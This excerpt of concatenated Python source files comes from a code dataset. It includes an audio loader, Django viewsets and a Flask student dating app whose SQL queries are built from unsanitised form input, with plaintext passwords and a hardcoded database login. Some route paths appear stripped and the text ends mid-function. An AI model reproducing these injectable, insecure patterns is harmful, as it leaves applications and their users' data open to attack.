pvalue, index = vals\n new_values.append((n/rank) * pvalue)\n ## xrange was a built in function in python2.x, it was renamed to range in python3.x\n ## used by qiime2\n ## for i in xrange(0, int(n)-1): (Mike's original)\n for i in range(0, int(n)-1):\n if new_values[i] < new_values[i+1]:\n new_values[i+1] = new_values[i]\n for i, vals in enumerate(values):\n pvalue, index = vals\n new_pvalues[index] = new_values[i]\n return new_pvalues\n\n\ndef main(args):\n pcs = read_pc(args.input_fp, args.min_explained)\n meta = pd.read_table(args.mapping_fp, index_col=0)\n\n if args.is_continuous:\n correls = pd.DataFrame(index=[\"R value\", \"p\"])\n for pc_axis in pcs:\n corr = spearmanr(meta[args.metadata_label], pcs[pc_axis])\n correls[pc_axis] = corr\n correls = correls.transpose()\n correls['p_adj'] = bh_adjust(correls['p'])\n correls.to_csv(args.output_fp, sep='\\t')\n\n else:\n raise NotImplementedError()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"-i\", \"--input_fp\", help=\"table of principle components only\", required=True)\n parser.add_argument(\"-m\", \"--mapping_fp\", help=\"mapping file location\", required=True)\n parser.add_argument(\"-o\", \"--output_fp\", help=\"output file location\", default=\"pc_correlations.txt\")\n parser.add_argument(\"-c\", \"--metadata_label\", help=\"minimum number of samples present in\", required=True)\n parser.add_argument(\"--correl_method\", help=\"correlation method\", default=\"spearman\")\n parser.add_argument(\"--is_continuous\", help=\"minimum p-value to determine edges\", default=False, action=\"store_true\")\n parser.add_argument(\"--min_explained\", help=\"minimum percent explained to be included in analysis\", default=0., type=float)\n\n args = parser.parse_args()\n\n main(args)\n","sub_path":"cross-sectional/01-scriptsForASDpaper/which_pc_explains.py","file_name":"which_pc_explains.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"406637204","text":"#\n# @lc app=leetcode.cn id=74 lang=python3\n#\n# [74] 搜索二维矩阵\n#\n\n# @lc code=start\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n if not matrix:\n return False\n m = len(matrix)\n n = len(matrix[0])\n for i in range(m):\n if matrix[i][n-1] == target:\n return True\n if matrix[i][n-1] > target:\n break\n left = 0\n right = n-1\n while left<=right:\n mid = (left+right)//2\n if matrix[i][mid]==target:\n return True\n elif matrix[i][mid]>target:\n right = mid - 1\n elif matrix[i][mid]= len(self.start_samples):\n print(\"error: sample index \" + str(sample_index) +\n \" is to high. Results in file_index \" + str(file_index))\n position_in_file = sample_index - self.start_samples[file_index]\n end_position_in_next_file = sample_index + \\\n self._item_length + 1 - self.start_samples[file_index + 1]\n\n if end_position_in_next_file < 0:\n file_name = 'arr_' + str(file_index)\n this_file = np.load(self.dataset_file, mmap_mode='r')[file_name]\n sample = this_file[position_in_file:position_in_file +\n self._item_length + 1]\n else:\n # load from two files\n file1 = np.load(self.dataset_file, mmap_mode='r')[\n 'arr_' + str(file_index)]\n file2 = np.load(self.dataset_file, mmap_mode='r')[\n 'arr_' + str(file_index + 1)]\n sample1 = file1[position_in_file:]\n sample2 = file2[:end_position_in_next_file]\n sample = np.concatenate((sample1, sample2))\n\n # Only if training: Pitch modulation\n if self.train:\n # Reverse quantization and encoding\n y = decode_mu(sample, self.classes)\n\n seg_length = int(self.sampling_rate *\n (random() * 0.25 + 0.25)) # 1/4 -> 1/2\n s = randint(0, self.sampling_rate - seg_length)\n e = s + seg_length\n\n n_steps = random() - 0.5 # +- 0.5\n shifted = lr.effects.pitch_shift(\n y[s:e], sr=self.sampling_rate, n_steps=n_steps)\n y[s:e] = np.clip(shifted, -1, 1)\n\n sample = quantize_data(y, self.classes, mu=True)\n\n example = torch.from_numpy(sample).type(torch.LongTensor)\n input = example[:self._item_length].unsqueeze(0)\n target = example[-self.target_length:].unsqueeze(0)\n\n one_hot = torch.FloatTensor(self.classes, self._item_length).zero_()\n one_hot.scatter_(0, input, 1.)\n\n return self.domain_index, one_hot, target\n\n def __len__(self):\n test_length = math.floor(self._length / self._test_stride)\n if self.train:\n return self._length - test_length\n else:\n return test_length\n\n\ndef quantize_data(data, classes, mu=True):\n x = data\n if mu:\n x = mu_law_encoding(x, classes)\n\n bins = np.linspace(-1, 1, classes)\n quantized = np.digitize(x, bins) - 1\n return quantized\n\ndef decode_mu(data, classes):\n y = (data / classes) * 2. - 1\n y = mu_law_expansion(y, classes)\n return y\n\ndef list_all_audio_files(location):\n audio_files = []\n if is_music_file(location):\n audio_files.append(location)\n else:\n for dirpath, dirnames, filenames in os.walk(location):\n for filename in [f for f in filenames if is_music_file(f)]:\n audio_files.append(os.path.join(dirpath, filename))\n\n if len(audio_files) == 0:\n print(\"found no audio files in \" + location)\n return audio_files\n\n\ndef is_music_file(f):\n return f.endswith((\".m4a\", \".mp3\", \".wav\", \".aif\", \"aiff\"))\n\n\ndef mu_law_encoding(data, mu):\n mu_x = np.sign(data) * np.log(1 + mu * np.abs(data)) / np.log(mu + 1)\n return mu_x\n\n\ndef mu_law_expansion(data, mu):\n s = np.sign(data) * (np.exp(np.abs(data) * np.log(mu + 1)) - 1) / mu\n return s\n\n\ndef convert_output_to_signal(x, classes):\n x = x.squeeze()\n dim = x.dim()\n x = x.transpose(dim - 2, dim - 1)\n\n prob = F.softmax(x, dim=dim - 1) # map seconds to buckets\n prob = prob.cpu()\n np_prob = prob.data.numpy() # Compute SM bucket for second\n\n x = np.apply_along_axis(\n lambda p: np.random.choice(classes, p=p), dim - 1, np_prob)\n return x\n\nclass CausalConv1d(nn.Conv1d):\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n dilation=1,\n groups=1,\n bias=True):\n self.__padding = (kernel_size - 1) * dilation\n\n super(CausalConv1d, self).__init__(\n in_channels,\n out_channels,\n kernel_size=kernel_size,\n stride=stride,\n padding=self.__padding,\n dilation=dilation,\n groups=groups,\n bias=bias)\n\n def forward(self, input):\n result = super(CausalConv1d, self).forward(input)\n if self.__padding != 0:\n return result[:, :, :-self.__padding]\n return result\n\n","sub_path":"audio_data.py","file_name":"audio_data.py","file_ext":"py","file_size_in_byte":8943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"478823411","text":"\"\"\"\nCopyright (c) 2019 Intel Corporation\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom functools import singledispatch\nfrom typing import Union\nimport numpy as np\nfrom ..config import StringField\nfrom ..representation import DetectionAnnotation, DetectionPrediction, TextDetectionPrediction, TextDetectionAnnotation\nfrom .postprocessor import Postprocessor, BasePostprocessorConfig\n\n\nclass CastToInt(Postprocessor):\n __provider__ = 'cast_to_int'\n annotation_types = (DetectionAnnotation, TextDetectionAnnotation)\n prediction_types = (DetectionPrediction, TextDetectionPrediction)\n\n round_policies_func = {\n 'nearest': np.rint,\n 'nearest_to_zero': np.trunc,\n 'lower': np.floor,\n 'greater': np.ceil\n }\n\n def validate_config(self):\n class _CastToIntConfigValidator(BasePostprocessorConfig):\n round_policy = StringField(optional=True, choices=self.round_policies_func.keys())\n\n cast_to_int_config_validator = _CastToIntConfigValidator(\n self.__provider__, on_extra_argument=_CastToIntConfigValidator.ERROR_ON_EXTRA_ARGUMENT\n )\n cast_to_int_config_validator.validate(self.config)\n\n def configure(self):\n self.round_func = self.round_policies_func[self.config.get('round_policy', 'nearest')]\n\n def process_image(self, annotation, prediction):\n @singledispatch\n def cast(entry):\n pass\n\n @cast.register(Union[DetectionAnnotation, DetectionPrediction])\n def _(entry):\n entry.x_mins = self.round_func(entry.x_mins)\n entry.x_maxs = self.round_func(entry.x_maxs)\n entry.y_mins = self.round_func(entry.y_mins)\n entry.y_maxs = self.round_func(entry.y_maxs)\n\n @cast.register(Union[TextDetectionAnnotation, TextDetectionPrediction])\n def _(entry):\n entry.points = self.round_func(entry.points)\n\n\n for annotation_ in annotation:\n cast(annotation_)\n\n for prediction_ in prediction:\n cast(prediction_)\n\n return annotation, prediction\n","sub_path":"tools/accuracy_checker/accuracy_checker/postprocessor/cast_to_int.py","file_name":"cast_to_int.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"178969069","text":"from rest_framework.viewsets import ModelViewSet\nfrom rest_framework.permissions import (IsAdminUser, IsAuthenticated)\nfrom rest_framework.status import (HTTP_204_NO_CONTENT, HTTP_404_NOT_FOUND)\nfrom rest_framework.response import Response\n\nfrom .serializers import (CountrySerializer, AdminCountrySerializer, StateSerializer,\n AdminStateSerializer, CitySerializer, AdminCitySerializer, TaxSerializer, AdminTaxSerializer)\nfrom .models import (Countries, States, Cities, Taxes)\n\nfrom permissions import ReadOnly\n\n\nclass CountryViewSet(ModelViewSet):\n def get_serializer_class(self):\n if self.request.user.is_authenticated:\n if self.request.user.admin:\n return AdminCountrySerializer\n return CountrySerializer\n\n def destroy(self, request, *args, **kwargs):\n country = Countries.objects.get(id=kwargs['pk'])\n if (country.deleted == False):\n # Setting Countries deleted to True\n country.deleted = True\n # Saving Changes\n country.save()\n\n return Response(data='Successfully Deleted', status=HTTP_204_NO_CONTENT)\n return Response(data='No Such Data Was Found', status=HTTP_404_NOT_FOUND)\n\n def get_queryset(self):\n if self.request.user.is_authenticated:\n if self.request.user.admin:\n return Countries.objects.all().order_by('id')\n return Countries.objects.filter(deleted=False).order_by('id')\n\n permission_classes = (IsAdminUser | ReadOnly,)\n\n\nclass StateViewSet(ModelViewSet):\n def get_serializer_class(self):\n if self.request.user.is_authenticated:\n if self.request.user.admin:\n return AdminStateSerializer\n return StateSerializer\n\n def destroy(self, request, *args, **kwargs):\n state = States.objects.get(id=kwargs['pk'])\n if (state.deleted == False):\n # Setting States deleted to True\n state.deleted = True\n # Saving Changes\n state.save()\n\n return Response(data='Successfully Deleted', status=HTTP_204_NO_CONTENT)\n return Response(data='No Such Data Was Found', status=HTTP_404_NOT_FOUND)\n\n def get_queryset(self):\n if self.request.user.is_authenticated:\n if self.request.user.admin:\n return States.objects.all().order_by('id')\n return States.objects.filter(deleted=False).order_by('id')\n\n permission_classes = (IsAdminUser | ReadOnly,)\n\n\nclass CityViewSet(ModelViewSet):\n def get_serializer_class(self):\n if self.request.user.is_authenticated:\n if self.request.user.admin:\n return AdminCitySerializer\n return CitySerializer\n\n def destroy(self, request, *args, **kwargs):\n city = Cities.objects.get(id=kwargs['pk'])\n if (city.deleted == False):\n # Setting Cities deleted to True\n city.deleted = True\n # Saving Changes\n city.save()\n\n return Response(data='Successfully Deleted', status=HTTP_204_NO_CONTENT)\n return Response(data='No Such Data Was Found', status=HTTP_404_NOT_FOUND)\n\n def get_queryset(self):\n if self.request.user.is_authenticated:\n if self.request.user.admin:\n return Cities.objects.all().order_by('id')\n return Cities.objects.filter(deleted=False).order_by('id')\n\n permission_classes = (IsAdminUser | ReadOnly,)\n\nclass TaxViewSet(ModelViewSet):\n def get_serializer_class(self):\n if self.request.user.is_authenticated:\n if self.request.user.admin:\n return AdminTaxSerializer\n return TaxSerializer\n\n def destroy(self, request, *args, **kwargs):\n tax = Taxes.objects.get(id=kwargs['pk'])\n if (tax.deleted == False):\n # Setting Taxes deleted to True\n tax.deleted = True\n # Saving Changes\n tax.save()\n\n return Response(data='Successfully Deleted', status=HTTP_204_NO_CONTENT)\n return Response(data='No Such Data Was Found', status=HTTP_404_NOT_FOUND)\n\n def get_queryset(self):\n if self.request.user.is_authenticated:\n if self.request.user.admin:\n return Taxes.objects.all().order_by('id')\n return Taxes.objects.filter(deleted=False).order_by('id')\n\n permission_classes = (IsAdminUser | ReadOnly,)\n","sub_path":"taxes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"425059128","text":"from sqlalchemy import *\r\nfrom sqlalchemy.sql import *\r\nfrom flask import *\r\nfrom flask.ext.session import Session\r\nfrom json import dumps\r\nimport datetime\r\nimport glob\r\nimport os\r\napp = Flask(__name__)\r\n\r\nengine = create_engine('mysql://serveurTinsa:TInSa@localhost/baseTinsa', echo=True)\r\nconnection = engine.connect()\r\n\r\n# ___ Pages de CONNEXION/INSCRIPTION ___ #\r\n\r\n\t#ROUTES\r\n@app.route('/index.html')\r\ndef index():\r\n\treturn redirect(url_for('accueil'))\r\n\r\n@app.route('/') \r\ndef accueil():\r\n\tif 'userID' in session:\r\n\t\treturn redirect(url_for('match'))\r\n\telse:\r\n\t\treturn render_template('index.html')\r\n\r\n\t#POST\r\n@app.route('/inscription', methods=['POST'])\r\ndef inscription():\r\n\tbirth = \"{0}/{1}/{2}\".format(request.form['birthyear'],request.form['birthmonth'],request.form['birthday'])\r\n\tconnection.execute(\"INSERT INTO Users(nom, prenom, sexe, date_naissance, departement, mail, annee, password) VALUES ('{0}', '{1}', '{2}', '{3}', '{4}', '{5}', {6}, '{7}')\".format(request.form['nom'], request.form['prenom'], request.form['sexe'], birth, request.form['depart'],request.form['email'], request.form['annee'], request.form['pwd']))\r\n\treturn redirect(url_for('accueil'));\r\n\r\n@app.route('/connect', methods=['POST'])\r\ndef connect():\r\n\tusername = request.form['email']\r\n\tpassword = request.form['pwd']\r\n\tliste = connection.execute(\"SELECT password FROM Users WHERE mail = '{0}'\".format(username))\r\n\trealPassword = liste.fetchone()\r\n\tif realPassword is None:\r\n\t\treturn redirect(url_for('accueil'))\r\n\tif (realPassword[0]) == password:\r\n\t\tlisteID = (connection.execute(\"SELECT id_user FROM Users WHERE mail = '{0}'\".format(username)))\r\n\t\tuserID = (listeID.fetchone())[0]\r\n\t\tsession['userID'] = userID\r\n\treturn redirect(url_for('accueil'))\r\n\r\n@app.route('/disconnect')\r\ndef disconnect():\r\n\tsession.pop('username', None)\r\n\tsession.pop('userID', None)\r\n\t\r\n\treturn redirect(url_for('accueil'))\r\n\r\n# ___ Pages de PROFIL ___ #\r\n\r\n\t#ROUTE\r\n@app.route('/profil.html')\r\ndef profil():\r\n\treturn render_template('profil.html')\r\n\r\n\t#JSON\r\n@app.route('/profil.json')\r\ndef profiljson():\r\n\trequete = connection.execute(\"SELECT id_user, prenom, departement, annee, biographie, date_naissance, nom, contact, mail FROM Users WHERE Users.id_user = {0}\".format(session['userID']))\r\n\tfichierJSON = [serializeForProfil(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\ndef serializeForProfil(user):\r\n\treturn {\r\n\t\t'prenom': user[1],\r\n\t\t'depart': user[2],\r\n\t\t'annee': user[3],\r\n\t\t'bio': user[4],\r\n\t\t'photo': \"profil_pictures/{0}\".format(user[0]),\r\n\t\t'age' : int(((datetime.datetime.now() - user[5]).days/365.25)),\r\n\t\t'nom' : user[6],\r\n\t\t'contact' : user[7],\r\n\t\t'mail' : user[8]\r\n\t}\r\n\r\n\r\n# ___ Pages de MODIFICATION PROFIL ___ #\r\n\r\n\t#ROUTE\r\n@app.route('/modprofil.html')\r\ndef modprofil():\r\n\treturn render_template('modprofil.html')\r\n\r\n\t#POST\r\n@app.route('/modification', methods=['POST'])\r\ndef modification():\r\n\tif request.form['nom'] :\r\n\t\tconnection.execute(\"UPDATE Users SET nom = '{0}' WHERE id_user = '{1}'\".format(request.form['nom'], session['userID']))\r\n\tif request.form['prenom'] :\r\n\t\tconnection.execute(\"UPDATE Users SET prenom = '{0}' WHERE id_user = '{1}'\".format(request.form['prenom'], session['userID']))\r\n\tif request.form['email'] :\r\n\t\tconnection.execute(\"UPDATE Users SET mail = '{0}' WHERE id_user = '{1}'\".format(request.form['email'], session['userID']))\r\n\tif request.form['depart'] != 'NULL':\r\n\t\tconnection.execute(\"UPDATE Users SET departement = '{0}' WHERE id_user = '{1}'\".format(request.form['depart'], session['userID']))\r\n\tif request.form['pwd'] :\r\n\t\tconnection.execute(\"UPDATE Users SET password = '{0}' WHERE id_user = '{1}'\".format(request.form['pwd'], session['userID']))\r\n\tif request.form['bio'] :\r\n\t\tconnection.execute(\"UPDATE Users SET biographie = '{0}' WHERE id_user = '{1}'\".format(request.form['bio'], session['userID']))\r\n\tif request.form['annee'] != 'NULL' :\r\n\t\tconnection.execute(\"UPDATE Users SET annee = {0} WHERE id_user = '{1}'\".format(request.form['annee'], session['userID']))\r\n\tif request.form['birthday'] != \"-\" :\r\n\t\tbirth = \"{0}/{1}/{2}\".format(request.form['birthyear'],request.form['birthmonth'],request.form['birthday'])\r\n\t\tconnection.execute(\"UPDATE Users SET date_naissance = '{0}' WHERE id_user = '{1}'\".format(birth, session['userID']))\r\n\tif request.form['sexe'] != 'NULL' :\r\n\t\tconnection.execute(\"UPDATE Users SET sexe = '{0}' WHERE id_user = '{1}'\".format(request.form['sexe'], session['userID']))\r\n\tif request.form['urlfacebook'] :\r\n\t\tconnection.execute(\"UPDATE Users SET contact = '{0}' WHERE id_user = '{1}'\".format(request.form['urlfacebook'], session['userID']))\r\n\tif request.files['photo'] :\r\n\t\tphoto = request.files['photo']\r\n\t\textension = photo.content_type.split(\"/\")[1]\r\n\t\tprint(\"Extension : {0}\".format(extension))\r\n\t\tfor file in glob.glob(\"./profil_pictures/{0}.*\".format(session['userID'])):\r\n \t\t\tos.remove(file)\r\n\t\tphoto.save(\"./profil_pictures/\" + \"{0}\".format(session['userID']) + \".\" + extension)\r\n\treturn redirect(url_for('profil'))\r\n\r\n\r\n# ___ Pages de MATCHS ___ #\r\n\r\n\t#ROUTE\r\n@app.route('/match.html')\r\ndef match():\r\n\treturn render_template('match.html')\r\n\r\n\t#JSON\r\n@app.route('/data.json')\r\ndef data():\r\n\trequete = connection.execute(\"SELECT id_user, prenom, departement, annee, biographie, date_naissance FROM Users WHERE Users.id_user NOT IN (SELECT id_userIsLiked FROM Swipes WHERE id_userWhoLike = {0}) AND Users.id_user != {0}\".format(session['userID']))\r\n\tfichierJSON = [serializeForMatch(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\n\r\ndef serializeForMatch(user):\r\n\treturn {\r\n\t\t'id': '{0}'.format(user[0]),\r\n\t\t'prenom': user[1],\r\n\t\t'depart': user[2],\r\n\t\t'annee': user[3],\r\n\t\t'biographie': user[4],\r\n\t\t'photo': \"./profil_pictures/{0}\".format(user[0]),\r\n\t\t'age' : int(((datetime.datetime.now() - user[5]).days/365.25))\r\n\t}\r\n\r\n\t#POSTS\r\n@app.route('/dislike/', methods=['POST'])\r\ndef dislike(IDDisliker):\r\n\tconnection.execute(\"INSERT INTO Swipes(id_userWhoLike, id_userIsLiked, date_swipe, liked) VALUES ({0}, {1}, '{2}', {3})\".format(session['userID'],IDDisliker, datetime.datetime.now(),False))\r\n\r\n@app.route('/like/', methods=['POST'])\r\ndef like(IDLiker):\r\n\tconnection.execute(\"INSERT INTO Swipes(id_userWhoLike, id_userIsLiked, date_swipe, liked) VALUES ({0}, {1}, '{2}', {3})\".format(session['userID'],IDLiker, datetime.datetime.now(),True))\r\n\trequete = connection.execute(\"SELECT COUNT(id_UserIsLiked) FROM Swipes WHERE id_UserIsLiked = {0} AND id_userWhoLike = {1} AND liked IS True\".format(session['userID'],IDLiker))\r\n\tif requete.fetchone()[0] != 0 :\r\n\t\tconnection.execute(\"INSERT INTO Affinites(id_user1, id_user2, date_affinite) VALUES ({0}, {1}, '{2}')\".format(session['userID'],IDLiker,datetime.datetime.now()))\r\n\t\r\n\r\n# ___ Pages de CREATION EVENT ___ #\r\n\r\n\t#ROUTE\r\n@app.route('/create_event.html')\r\ndef create_event():\r\n\treturn render_template('create_event.html')\r\n\r\n\t#POST\r\n@app.route('/eventcreate', methods=['POST'])\r\ndef eventcreate():\r\n\tdate = \"{0}/{1}/{2}\".format(request.form['year'],request.form['month'],request.form['day'])\r\n\tconnection.execute(\"INSERT INTO Events(nom, id_creator, date_event, lieu, description) VALUES ('{0}', {1}, '{2}', '{3}', '{4}')\".format(request.form['eventname'], session['userID'], date, request.form['eventplace'], request.form['eventdesc']))\r\n\tIDEvent = connection.execute(\"SELECT id_event FROM Events WHERE id_creator = {0} AND nom = '{1}'\".format(session['userID'], request.form['eventname'])).fetchone()[0]\r\n\tprint(\"IDEVENT = {0}\".format(IDEvent))\r\n\tif request.files['eventimage'] :\r\n\t\tphoto = request.files['eventimage']\r\n\t\textension = photo.content_type.split(\"/\")[1]\r\n\t\tprint(\"Extension : {0}\".format(extension))\r\n\t\tphoto.save(\"./event_pictures/\" + \"{0}\".format(IDEvent) + \".\" + extension)\r\n\treturn redirect(url_for('profil'))\r\n\r\n\r\ndef serializeForAffinite(user):\r\n\treturn {\r\n\t\t'prenom': user[1],\r\n\t\t'depart': user[2],\r\n\t\t'annee': user[3],\r\n\t\t'biographie': user[4],\r\n\t\t'photo': \"profil_pictures/{0}\".format(user[0]),\r\n\t\t'age' : int(((datetime.datetime.now() - user[5]).days/365.25)),\r\n\t\t'contact' : user[6]\r\n\t}\r\n\r\n# ___ Pages des AFFINITES/LIKE/DISLIKE ___ #\r\n\r\n\t#ROUTES\r\n@app.route('/likes.html')\r\ndef likes():\r\n\treturn render_template('likes.html')\r\n\r\n@app.route('/dislikes.html')\r\ndef dislikes():\r\n\treturn render_template('dislikes.html')\r\n\r\n@app.route('/affinites.html')\r\ndef affinites():\r\n\treturn render_template('affinites.html')\r\n\r\n\t#UNLIKED/RELIKED\r\n@app.route('/deleteAffinites/', methods=['POST'])\r\ndef deleteAffinites(idDelete):\r\n\tconnection.execute(\"UPDATE Swipes SET liked = {2} WHERE id_userWhoLike = {0} AND id_userIsLiked = {1}\".format(session['userID'], idDelete, False))\r\n\tconnection.execute(\"DELETE FROM Affinites WHERE (id_user1 = {0} AND id_user2 = {1}) OR (id_user1 = {1} AND id_user2 = {0})\".format(session['userID'],idDelete))\r\n\treturn redirect(url_for('affinites'))\r\n\r\n@app.route('/deleteLikes/', methods=['POST'])\r\ndef deleteLikes(idLiked):\r\n\tconnection.execute(\"UPDATE Swipes SET liked = {2} WHERE id_userWhoLike = {0} AND id_userIsLiked = {1}\".format(session['userID'], idLiked, False))\r\n\treturn redirect(url_for('likes'))\r\n\r\n@app.route('/reLikes/', methods=['POST'])\r\ndef reLikes(idLiked):\r\n\tconnection.execute(\"UPDATE Swipes SET liked = {2} WHERE id_userWhoLike = {0} AND id_userIsLiked = {1}\".format(session['userID'], idLiked, True))\r\n\trequete = connection.execute(\"SELECT COUNT(id_UserIsLiked) FROM Swipes WHERE id_UserIsLiked = {0} AND id_userWhoLike = {1} AND liked IS True\".format(session['userID'],idLiked))\r\n\tif requete.fetchone()[0] != 0 :\r\n\t\tconnection.execute(\"INSERT INTO Affinites(id_user1, id_user2, date_affinite) VALUES ({0}, {1}, '{2}')\".format(session['userID'],idLiked,datetime.datetime.now()))\r\n\treturn redirect(url_for('dislikes'))\r\n\r\n@app.route('/deleteDislikes/', methods=['POST'])\r\ndef deleteDislike(idDisliked):\r\n\tconnection.execute(\"DELETE FROM Swipes WHERE id_userWhoLike = {0} AND id_userIsLiked = {1}\".format(session['userID'], idDisliked))\r\n\treturn redirect(url_for('dislikes'))\r\n\r\n\t#JSON\r\n@app.route('/likes.json')\r\ndef likesjson():\r\n\trequete = connection.execute(\"SELECT id_user, prenom, departement, annee, biographie, date_naissance, mail, nom FROM Users WHERE Users.id_user IN (SELECT id_userIsLiked FROM Swipes WHERE id_userWhoLike = {0} AND liked IS True) AND Users.id_user NOT IN (SELECT id_user1 FROM Affinites WHERE id_user2 = {0}) AND Users.id_user NOT IN (SELECT id_user2 FROM Affinites WHERE id_user1 = {0})\".format(session['userID']))\r\n\tfichierJSON = [serializeForAffinite(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\n@app.route('/dislikes.json')\r\ndef dislikesjson():\r\n\trequete = connection.execute(\"SELECT id_user, prenom, departement, annee, biographie, date_naissance, mail, nom FROM Users WHERE Users.id_user IN (SELECT id_userIsLiked FROM Swipes WHERE id_userWhoLike = {0} AND liked IS False)\".format(session['userID']))\r\n\tfichierJSON = [serializeForAffinite(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\n@app.route('/affinites.json')\r\ndef affinitesjson():\r\n\trequete = connection.execute(\"SELECT id_user, prenom, departement, annee, biographie, date_naissance, mail, nom FROM Users WHERE Users.id_user IN (SELECT id_user1 FROM Affinites WHERE id_user2 = {0}) OR Users.id_user IN (SELECT id_user2 FROM Affinites WHERE id_user1 = {0}) \".format(session['userID']))\r\n\tfichierJSON = [serializeForAffinite(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\ndef serializeForAffinite(user):\r\n\treturn {\r\n\t\t'id': user[0],\r\n\t\t'prenom': user[1],\r\n\t\t'depart': user[2],\r\n\t\t'annee': user[3],\r\n\t\t'bio': user[4],\r\n\t\t'photo': \"profil_pictures/{0}\".format(user[0]),\r\n\t\t'age' : int(((datetime.datetime.now() - user[5]).days/365.25)),\r\n\t\t'contact' : user[6],\r\n\t\t'nom' : user[7]\r\n\t}\r\n\r\n\r\n# ___ Pages des Evenements ___ #\r\n\r\n\t#ROUTES\r\n@app.route('/event.html')\r\ndef event():\r\n\treturn render_template('event.html')\r\n\r\n@app.route('/eventgo.html')\r\ndef eventgo():\r\n\treturn render_template('eventgo.html')\r\n\r\n@app.route('/myevent.html')\r\ndef myevent():\r\n\treturn render_template('myevent.html')\r\n\r\n\t#JSON\r\n@app.route('/event.json')\r\ndef eventjson():\r\n\trequete = connection.execute(\"SELECT Events.id_event, Events.nom, Events.id_creator, Events.date_event, Events.lieu, Events.description, COUNT(Participants.id_partener), Users.contact FROM Events LEFT JOIN Participants ON Events.id_event = Participants.id_event LEFT JOIN Users ON Users.id_user = Events.id_creator WHERE Events.id_event NOT IN (SELECT id_event FROM Participants WHERE id_partener = {0}) AND Events.id_event NOT IN (SELECT id_event FROM Events WHERE id_creator = {0}) GROUP BY Events.id_event ORDER BY Events.date_event\".format(session['userID']))\r\n\tfichierJSON = [serializeForEvent(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\ndef serializeForEvent(event):\r\n\treturn {\r\n\t\t\"nom\": event[1],\r\n \"lieu\": event[4],\r\n\t\t\"date\": event[3].strftime(\"%d/%m/%y\"),\r\n \"desc\": event[5],\r\n\t\t\"photo\": \"event_pictures/{0}\".format(event[0]),\r\n\t\t\"nombre\": event[6]+1,\r\n\t\t\"id\":event[0],\r\n\t\t\"contact\": event[7]\r\n\t}\r\n\r\n@app.route('/eventgo.json')\r\ndef eventgojson():\r\n\trequete = connection.execute(\"SELECT Events.id_event, Events.nom, Events.id_creator, Events.date_event, Events.lieu, Events.description, COUNT(Participants.id_partener), Users.contact FROM Events LEFT JOIN Participants ON Events.id_event = Participants.id_event LEFT JOIN Users ON Users.id_user = Events.id_creator WHERE Events.id_event IN (SELECT id_event FROM Participants WHERE id_partener = {0}) GROUP BY Events.id_event ORDER BY Events.date_event\".format(session['userID']))\r\n\tfichierJSON = [serializeForEvent(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\n@app.route('/myevent.json')\r\ndef myeventjson():\r\n\trequete = connection.execute(\"SELECT Events.id_event, Events.nom, Events.id_creator, Events.date_event, Events.lieu, Events.description, COUNT(Participants.id_partener), Users.contact FROM Events LEFT JOIN Participants ON Events.id_event = Participants.id_event LEFT JOIN Users ON Users.id_user = Events.id_creator WHERE Events.id_creator = {0} GROUP BY Events.id_event ORDER BY Events.date_event\".format(session['userID']))\r\n\tfichierJSON = [serializeForEvent(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\n\r\n\r\n\r\n\r\n\t#PARTICIPATION\r\n@app.route('/participe/', methods=['POST'])\r\ndef participe(IDEvent):\r\n\tconnection.execute(\"INSERT INTO Participants(id_partener, id_event) VALUES ({0}, {1})\".format(session['userID'],IDEvent))\r\n\treturn 0\r\n\r\n@app.route('/supprimer/',methods=['POST'])\r\ndef supprimer(IDEvent):\r\n\tif (connection.execute(\"SELECT id_creator FROM Events WHERE id_event = {0}\".format(IDEvent))).fetchone()[0] == session['userID']:\r\n\t\tconnection.execute(\"DELETE FROM Events WHERE id_event = {0}\".format(IDEvent))\r\n\treturn \"DONE\"\r\n\t\t\r\n@app.route('/dessiste/', methods=['POST'])\r\ndef desiste(IDEvent):\r\n\tconnection.execute(\"DELETE FROM Participants WHERE id_partener = {0} AND id_event = {1}\".format(session['userID'],IDEvent))\r\n\treturn 'DONE'\r\n\r\n# ___ Route pour FICHIERS de configurations ___ #\r\n@app.route('/css/')\r\ndef css(file):\r\n\treturn send_from_directory('templates/css', file)\r\n\r\n@app.route('/fonts/')\r\ndef fonts(file):\r\n\treturn send_from_directory('templates/fonts', file)\r\n\r\n@app.route('/js/')\r\ndef js(file):\r\n\treturn send_from_directory('templates/js', file)\r\n\r\n\r\n# ___ Route pour IMAGES ___ #\r\n@app.route('/images/')\r\ndef images(file):\r\n\tif file == 'profil':\r\n\t\treturn send_from_directory('./profil_pictures','{0}.jpeg'.format(session['userID']))\r\n\treturn send_from_directory('templates/images', file)\r\n\r\n@app.route('/profil_pictures/')\r\ndef profil_pictures(id):\r\n\tphoto = glob.glob('./profil_pictures/{0}.*'.format(id))\r\n\tif photo:\r\n\t\tphoto = photo[0]\r\n\t\tprint(\"PHOTO est {0}\".format(photo))\r\n\tif photo :\r\n\t\treturn 